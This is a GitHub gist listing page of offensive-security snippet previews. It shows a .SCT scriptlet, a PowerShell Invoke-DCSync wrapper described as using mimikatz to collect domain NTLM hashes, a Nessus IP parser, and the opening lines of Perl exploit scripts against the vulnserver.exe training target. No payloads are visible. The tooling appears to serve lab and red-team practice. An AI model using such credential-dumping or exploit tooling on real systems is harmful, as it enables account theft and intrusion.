Skip to content

Instantly share code, notes, and snippets.

@0xbadjuju
0xbadjuju / test.sct
Last active February 17, 2023 20:55 — forked from bohops/test.sct
.SCT for testing (++++ @subTee)
<?XML version="1.0"?>
<scriptlet>
<registration
description="NetSPI"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
@0xbadjuju
0xbadjuju / Invoke-DCSync.ps1
Created June 22, 2020 13:25 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
@0xbadjuju
0xbadjuju / Parse-IPsNessus.ps1
Created February 21, 2020 18:56
Parses the IPs from a Nessus scan file
function Parse-IPsNessus
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True, HelpMessage="File Name")]
[String]$fileName
)
$fileNamePath = Resolve-Path("$fileName")
@0xbadjuju
0xbadjuju / lter2.pl
Created February 14, 2020 18:40
vulnserver.exe LTER 2
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.2.133");
my $port = 9999;
@0xbadjuju
0xbadjuju / lter.pl
Last active February 7, 2020 15:32
vulnserver.exe LTER
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;
@0xbadjuju
0xbadjuju / gter.pl
Created February 5, 2020 02:31
vulnserver.exe GTER
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;
@0xbadjuju
0xbadjuju / kstet.pl
Created January 31, 2020 19:00
vulnserver.exe KSTET
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;
@0xbadjuju
0xbadjuju / trun.pl
Created January 30, 2020 17:42
vulnserver.exe TRUN
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;
@0xbadjuju
0xbadjuju / gmon.pl
Created January 30, 2020 17:04
vulnserver.exe GMON
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;
#!/usr/bin/perl
use strict;
use warnings;
my $reasm = join("", reverse($ARGV[0] =~ m/../g));
print "Searching for: " . $reasm . "\n";
my $i = 0;